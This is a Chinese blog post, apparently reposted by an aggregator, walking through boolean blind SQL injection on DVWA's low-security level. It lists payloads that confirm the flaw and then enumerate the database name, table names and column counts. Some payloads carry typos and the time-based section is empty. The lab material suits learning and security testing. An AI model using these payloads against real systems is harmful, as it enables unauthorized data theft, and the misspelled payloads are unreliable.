DVWA-sql注入(盲注)

Posted 幸运儿mnmnmn

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DVWA-sql注入(盲注)相关的知识,希望对你有一定的参考价值。

SQL注入分类

1.(以字符类型方式)

     ▪数字型

     ▪字符型

2.(以注入方式)

       ▪ 回显注入        < 回显正常、 回显报错注入>

       ▪ 盲注               <布尔盲注、  时间盲注  >

 

 

dvwa盲注模块 

低级别

输入5

 

 

输入6

 

 

 

输入  1 and  1=1 #  正确  1  and  1=2   #  正确

 

输入  1\' and \'1\'=\'1 #  正确   1’ and  \'1\'=\'2 # 错误

 

说明 存在注入漏洞  且是字符型  得盲注

 

 

 

一、猜解数据库名

 

1\' and lengeh(database()) > 3  # 正确

 

1\' and lengeh(database()) > 4   # 错误

 

数据库长度是4 

输入1’ and length(database())=4 # ,显示存在:说明长度为4

 

 

 

 

 

 

然后采用二分法猜解数据库的名字,可以用if函数,这里用的ASCII值,道理都是一样的:

1’ and ascii(substr(databse(),1,1))=100 #

 

 

 第一个字母的ASCII值是100,也就是d,以此类推得出数据库名是dvwa。

 

二、 猜解表名:

1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 #

 

 

 说明有两个表。

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 

显示存在,说明第一个表的长度是9.

 

 

 

 

 

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #

显示存在,说明第一个字母是g。

再重复步骤猜解,即可猜解出两个表名(guestbook、users)。

 

 

三、猜解字段名:

猜解数量:1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 #

显示存在,说明一共8个字段。

然后再利用2分法猜解字段名和字段中数据。

 

 

 

 

基于时间的盲注:

 

 

 

 

 

 

 

 

 

 

 

 

 

以上是关于DVWA-sql注入(盲注)的主要内容,如果未能解决你的问题,请参考以下文章

DVWA-SQL注入

DVWA-SQL注入-low

DVWA-SQL注入

sql注入学习基于布尔 SQL 盲注

SQL注入|盲注篇~

DVWA——SQL Injection Blind(SQL盲注)